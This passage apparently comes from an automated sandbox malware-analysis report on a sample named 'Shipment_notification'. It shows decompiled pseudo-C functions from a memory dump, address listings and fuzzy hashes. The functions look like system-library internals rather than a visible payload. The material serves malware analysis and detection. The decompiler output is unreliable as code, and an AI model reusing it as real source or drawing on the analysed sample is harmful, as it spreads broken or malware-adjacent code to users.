							_t94 = E01B07D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01B67016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1bd8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1bd7b00; // 0x0
							asm("ror esi, cl");
							 *0x1bdb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E01B295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E01AF7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                0x01b103f1
                                                                                0x01b103f7
                                                                                0x01b103f9
                                                                                0x01b103fb
                                                                                0x01b103fd
                                                                                0x01b10400
                                                                                0x01b1040a
                                                                                0x01b54c7a
                                                                                0x01b10537
                                                                                0x01b10547
                                                                                0x01b10410
                                                                                0x01b10410
                                                                                0x01b10414
                                                                                0x01b10417
                                                                                0x01b1041a
                                                                                0x01b10421
                                                                                0x01b10424
                                                                                0x01b1042b
                                                                                0x01b1043b
                                                                                0x01b1043e
                                                                                0x01b1043f
                                                                                0x01b1043f
                                                                                0x01b10446
                                                                                0x01b10449
                                                                                0x01b1044c
                                                                                0x01b1044f
                                                                                0x01b10459
                                                                                0x01b54c8d
                                                                                0x01b1045f
                                                                                0x01b1045f
                                                                                0x01b1045f
                                                                                0x01b10467
                                                                                0x01b54c97
                                                                                0x01b54c9d
                                                                                0x01b54ca4
                                                                                0x01b54caa
                                                                                0x01b54caf
                                                                                0x01b54cb1
                                                                                0x01b54cc3
                                                                                0x01b54cb3
                                                                                0x01b54cbc
                                                                                0x01b54cbc
                                                                                0x01b54cc8
                                                                                0x01b54ccb
                                                                                0x01b54cd7
                                                                                0x01b54cda
                                                                                0x01b54cdf
                                                                                0x01b54cdf
                                                                                0x01b54ccb
                                                                                0x01b54ca4
                                                                                0x01b1046d
                                                                                0x01b1046f
                                                                                0x01b1046f
                                                                                0x01b10471
                                                                                0x01b10476
                                                                                0x01b1047a
                                                                                0x01b1047b
                                                                                0x01b10483
                                                                                0x01b10489
                                                                                0x01b1048d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54ce9
                                                                                0x01b54cef
                                                                                0x01b54d22
                                                                                0x01b54d22
                                                                                0x00000000
                                                                                0x01b54d22
                                                                                0x01b54cf1
                                                                                0x01b54cf7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54cf9
                                                                                0x01b54cff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54d05
                                                                                0x01b54d07
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54d0d
                                                                                0x01b54d0f
                                                                                0x01b54d14
                                                                                0x01b54d16
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54d1c
                                                                                0x01b54d1c
                                                                                0x01b10499
                                                                                0x01b10535
                                                                                0x01b10535
                                                                                0x00000000
                                                                                0x01b10535
                                                                                0x01b104a6
                                                                                0x01b54d2c
                                                                                0x01b54d37
                                                                                0x01b54d39
                                                                                0x01b54d3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54d41
                                                                                0x01b54d48
                                                                                0x01b10527
                                                                                0x01b1052b
                                                                                0x01b1052d
                                                                                0x01b10530
                                                                                0x01b10530
                                                                                0x00000000
                                                                                0x01b1052b
                                                                                0x01b54d4e
                                                                                0x01b104ac
                                                                                0x01b104ac
                                                                                0x01b104af
                                                                                0x01b104b2
                                                                                0x01b104b7
                                                                                0x01b104b9
                                                                                0x01b104bb
                                                                                0x01b104bd
                                                                                0x01b104bf
                                                                                0x01b104c5
                                                                                0x01b104c9
                                                                                0x01b54d53
                                                                                0x01b54d59
                                                                                0x01b54db9
                                                                                0x01b54dba
                                                                                0x01b54dbf
                                                                                0x01b54dc2
                                                                                0x01b54dc4
                                                                                0x01b54dc7
                                                                                0x01b54dce
                                                                                0x00000000
                                                                                0x01b54dce
                                                                                0x01b54d5b
                                                                                0x01b54d61
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54d63
                                                                                0x01b54d69
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54d6b
                                                                                0x01b54d6e
                                                                                0x01b54d74
                                                                                0x01b54d76
                                                                                0x01b54d7c
                                                                                0x01b54d7e
                                                                                0x01b54d84
                                                                                0x01b54d89
                                                                                0x01b54d8c
                                                                                0x01b54d8d
                                                                                0x01b54d92
                                                                                0x01b54d95
                                                                                0x01b54d96
                                                                                0x01b54d98
                                                                                0x01b54d9a
                                                                                0x01b54d9f
                                                                                0x01b54da4
                                                                                0x01b54da6
                                                                                0x01b54da8
                                                                                0x01b54daf
                                                                                0x01b54db1
                                                                                0x01b54db1
                                                                                0x01b54daf
                                                                                0x01b54da6
                                                                                0x01b54d84
                                                                                0x01b54d7c
                                                                                0x00000000
                                                                                0x01b54d74
                                                                                0x01b104d6
                                                                                0x01b54de1
                                                                                0x01b104dc
                                                                                0x01b104dc
                                                                                0x01b104dc
                                                                                0x01b104e4
                                                                                0x01b54deb
                                                                                0x01b54df1
                                                                                0x01b54df8
                                                                                0x01b54dfe
                                                                                0x01b54e03
                                                                                0x01b54e05
                                                                                0x01b54e17
                                                                                0x01b54e07
                                                                                0x01b54e10
                                                                                0x01b54e10
                                                                                0x01b54e1c
                                                                                0x01b54e1f
                                                                                0x01b54e35
                                                                                0x01b54e35
                                                                                0x01b54e1f
                                                                                0x01b54df8
                                                                                0x01b104f1
                                                                                0x01b104fa
                                                                                0x01b54e3f
                                                                                0x01b54e47
                                                                                0x01b54e5b
                                                                                0x01b54e61
                                                                                0x01b54e67
                                                                                0x01b54e69
                                                                                0x01b54e71
                                                                                0x01b54e73
                                                                                0x01b10500
                                                                                0x01b10500
                                                                                0x01b10500
                                                                                0x01b104fa
                                                                                0x01b10508
                                                                                0x01b1051d
                                                                                0x01b1051d
                                                                                0x01b1051f
                                                                                0x01b10524
                                                                                0x00000000
                                                                                0x01b10524
                                                                                0x01b10515
                                                                                0x01b10517
                                                                                0x01b54e7a
                                                                                0x01b54e7c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b54e85
                                                                                0x00000000
                                                                                0x01b54e85
                                                                                0x00000000
                                                                                0x01b10517

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5fa689b2a5397d77ae50895ea272963f4d4bf8ed0518ebff8fbf49baa691e1f5
                                                                                • Instruction ID: 3030c77ddf190c33bd4229573508cfd6d81b79056ecd5fb000d82d2d8aaf9839
                                                                                • Opcode Fuzzy Hash: 5fa689b2a5397d77ae50895ea272963f4d4bf8ed0518ebff8fbf49baa691e1f5
                                                                                • Instruction Fuzzy Hash: DA91F831E002159BEF2DAB6CC884BAD7BB4EB05714F0602E5FE11AB2D5EB749D80C791
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B66DC9 Relevance: .2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E01B66DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01B66B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01B07D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01B29AE0();
					_t87 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E01B6795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E01B6795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E01B6795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E01B6795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01B04620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01B66B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01B66B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01B66B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01B66B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01B07D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01B29AE0();
								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01B02400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01B02400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01B02400( &_v52);
							}
							if(_v28 >= 0) {
								return L01B02400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                0x01b66dd4
                                                                                0x01b66dde
                                                                                0x01b66de1
                                                                                0x01b66de3
                                                                                0x01b66de6
                                                                                0x01b66de9
                                                                                0x01b66dec
                                                                                0x01b66def
                                                                                0x01b66df2
                                                                                0x01b66df5
                                                                                0x01b66dfe
                                                                                0x01b66e04
                                                                                0x01b66e09
                                                                                0x01b66e0d
                                                                                0x01b66e18
                                                                                0x01b66e1b
                                                                                0x01b66e22
                                                                                0x01b66e2d
                                                                                0x01b66e30
                                                                                0x01b66e36
                                                                                0x01b66e42
                                                                                0x01b66e4d
                                                                                0x01b66e50
                                                                                0x01b66e55
                                                                                0x01b66e5c
                                                                                0x01b66e6e
                                                                                0x01b66e5e
                                                                                0x01b66e67
                                                                                0x01b66e67
                                                                                0x01b66e73
                                                                                0x01b66e74
                                                                                0x01b66e77
                                                                                0x01b66e7c
                                                                                0x01b66e7d
                                                                                0x01b66e8e
                                                                                0x01b66e93
                                                                                0x01b66e9c
                                                                                0x01b66ea8
                                                                                0x01b66eab
                                                                                0x01b66eac
                                                                                0x01b66eb3
                                                                                0x01b66ecd
                                                                                0x01b66edc
                                                                                0x01b66ee2
                                                                                0x01b66ee5
                                                                                0x01b66ef2
                                                                                0x01b66efb
                                                                                0x01b66f01
                                                                                0x01b66f06
                                                                                0x01b66f0b
                                                                                0x01b66f11
                                                                                0x01b66f1a
                                                                                0x01b66f22
                                                                                0x01b66f26
                                                                                0x01b66f26
                                                                                0x01b66f33
                                                                                0x01b66f41
                                                                                0x01b66f44
                                                                                0x01b66f47
                                                                                0x01b66f54
                                                                                0x01b66f65
                                                                                0x01b66f77
                                                                                0x01b66f7c
                                                                                0x01b66f82
                                                                                0x01b66f91
                                                                                0x01b66f99
                                                                                0x01b66fa3
                                                                                0x01b66fae
                                                                                0x01b66fae
                                                                                0x01b66fba
                                                                                0x01b66fbb
                                                                                0x01b66fbc
                                                                                0x01b66fc1
                                                                                0x01b66fc2
                                                                                0x01b66fd3
                                                                                0x01b66fd8
                                                                                0x01b66fd8
                                                                                0x01b66fdf
                                                                                0x01b66fe8
                                                                                0x01b66fee
                                                                                0x01b66fee
                                                                                0x01b66ff5
                                                                                0x01b66ffb
                                                                                0x01b66ffb
                                                                                0x01b67004
                                                                                0x00000000
                                                                                0x01b6700a
                                                                                0x01b67004
                                                                                0x01b66eb3
                                                                                0x01b66e9c
                                                                                0x01b67015

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                • Instruction ID: 474b72ecba7a609bf923be49009e28af9de595cc1a0b890fa1ceb1f7b9054f87
                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                • Instruction Fuzzy Hash: BE719171900619EFDF15DFA4C984ADEBBB8FF58304F1440A9E504E7290DB34EA45CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B7B8D0 Relevance: .2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 39%
                                                                                			E01B7B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1bd7b9c; // 0x0
				_t124 = L01B04620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01B29800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E01B295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E01B295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L01B077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01B29910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E01B295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1bd7b9c; // 0x0
									_t92 = L01B04620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01B29910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E01AEA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E01B7E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E01B7E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E01B295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                0x01b7b8d9
                                                                                0x01b7b8e4
                                                                                0x00000000
                                                                                0x01b7b8e6
                                                                                0x01b7b8f3
                                                                                0x01b7b8f5
                                                                                0x01b7b8f5
                                                                                0x01b7b8f8
                                                                                0x01b7b920
                                                                                0x01b7b924
                                                                                0x01b7b936
                                                                                0x01b7b939
                                                                                0x01b7b93d
                                                                                0x01b7b948
                                                                                0x01b7b9a0
                                                                                0x01b7b9a0
                                                                                0x01b7b9a4
                                                                                0x01b7b9bf
                                                                                0x01b7b9c4
                                                                                0x01b7b9c6
                                                                                0x01b7b9cd
                                                                                0x01b7b9d1
                                                                                0x01b7bad4
                                                                                0x01b7bad8
                                                                                0x01b7bada
                                                                                0x01b7badc
                                                                                0x01b7badc
                                                                                0x01b7badf
                                                                                0x01b7bae0
                                                                                0x01b7bae2
                                                                                0x01b7bae4
                                                                                0x01b7baec
                                                                                0x01b7baee
                                                                                0x01b7baf0
                                                                                0x01b7baf0
                                                                                0x01b7baec
                                                                                0x01b7bafb
                                                                                0x01b7bafc
                                                                                0x01b7bafe
                                                                                0x01b7bb01
                                                                                0x01b7bb01
                                                                                0x00000000
                                                                                0x01b7bb06
                                                                                0x01b7b9d7
                                                                                0x01b7b9db
                                                                                0x01b7b9db
                                                                                0x01b7b9de
                                                                                0x01b7b9de
                                                                                0x01b7b9e4
                                                                                0x01b7b9e7
                                                                                0x01b7b9ea
                                                                                0x01b7b9ec
                                                                                0x01b7b9ef
                                                                                0x01b7b9f3
                                                                                0x01b7ba1b
                                                                                0x01b7ba1b
                                                                                0x01b7ba23
                                                                                0x01b7ba24
                                                                                0x01b7ba27
                                                                                0x01b7ba2a
                                                                                0x01b7ba2b
                                                                                0x01b7ba2e
                                                                                0x01b7ba30
                                                                                0x01b7ba37
                                                                                0x01b7ba3f
                                                                                0x01b7ba9c
                                                                                0x01b7baa2
                                                                                0x01b7bb13
                                                                                0x01b7bb15
                                                                                0x01b7baae
                                                                                0x01b7baae
                                                                                0x01b7bab3
                                                                                0x01b7bab5
                                                                                0x01b7baba
                                                                                0x01b7bac8
                                                                                0x01b7bac8
                                                                                0x01b7baba
                                                                                0x01b7bacd
                                                                                0x01b7bacf
                                                                                0x00000000
                                                                                0x01b7bacf
                                                                                0x01b7bb1a
                                                                                0x00000000
                                                                                0x01b7bb1c
                                                                                0x01b7baa7
                                                                                0x01b7bb11
                                                                                0x00000000
                                                                                0x01b7bb11
                                                                                0x01b7baa9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b7ba41
                                                                                0x01b7ba41
                                                                                0x01b7ba41
                                                                                0x01b7ba58
                                                                                0x01b7ba5d
                                                                                0x01b7ba62
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b7ba64
                                                                                0x01b7ba67
                                                                                0x01b7ba68
                                                                                0x01b7ba69
                                                                                0x01b7ba6c
                                                                                0x01b7ba6f
                                                                                0x01b7ba71
                                                                                0x01b7ba78
                                                                                0x01b7ba80
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b7ba90
                                                                                0x01b7ba90
                                                                                0x01b7ba97
                                                                                0x00000000
                                                                                0x01b7ba97
                                                                                0x01b7b9f5
                                                                                0x01b7b9f7
                                                                                0x01b7b9f7
                                                                                0x01b7b9fa
                                                                                0x01b7ba03
                                                                                0x01b7ba07
                                                                                0x01b7ba0c
                                                                                0x01b7ba10
                                                                                0x01b7ba17
                                                                                0x00000000
                                                                                0x01b7b9f7
                                                                                0x01b7b9a6
                                                                                0x01b7b9a8
                                                                                0x01b7b9af
                                                                                0x01b7b9b3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b7b9b9
                                                                                0x00000000
                                                                                0x01b7b9b9
                                                                                0x01b7b94d
                                                                                0x01b7b98f
                                                                                0x01b7b995
                                                                                0x01b7b999
                                                                                0x01b7b960
                                                                                0x01b7b967
                                                                                0x01b7b968
                                                                                0x01b7b96a
                                                                                0x00000000
                                                                                0x01b7b96a
                                                                                0x01b7b99b
                                                                                0x01b7b99e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b7b99e
                                                                                0x01b7b951
                                                                                0x01b7b954
                                                                                0x01b7b95a
                                                                                0x01b7b95e
                                                                                0x01b7b972
                                                                                0x01b7b979
                                                                                0x01b7b97d
                                                                                0x01b7b97f
                                                                                0x01b7b980
                                                                                0x01b7b982
                                                                                0x01b7b984
                                                                                0x00000000
                                                                                0x01b7b984
                                                                                0x00000000
                                                                                0x01b7b926
                                                                                0x00000000
                                                                                0x01b7b926

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 11f8c8cc084ffeb14c7c0219c2d21606199eaad3bcc6b45f0386751adcb3b79e
                                                                                • Instruction ID: 734f50e60bc2f3c3ec3fd377fec73ff0d001ff9e048ba0a48f24f5f986bfe23d
                                                                                • Opcode Fuzzy Hash: 11f8c8cc084ffeb14c7c0219c2d21606199eaad3bcc6b45f0386751adcb3b79e
                                                                                • Instruction Fuzzy Hash: FF71F532200702AFDB3AEF18CA44F66BBA5EF40724F1445A8E669972E0DB71E944CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE52A5 Relevance: .2, Instructions: 161COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E01AE52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E01AFEEF0(0x1bd79a0);
					_t104 =  *0x1bd8210; // 0x1582c90
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E01AFEB70(_t93, 0x1bd79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01B29890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E01AFEEF0(0x1bd79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E01AFEB70(0, 0x1bd79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1582c9d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E01B1F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E01AFEEF0(0x1bd79a0);
									__eflags =  *0x1bd8210 - _t104; // 0x1582c90
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1bd8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01B64888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E01AFEB70(_t95, 0x1bd79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E01B295D0();
											L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E01B295D0();
											L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E01AFEB70(_t93, 0x1bd79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E01B295D0();
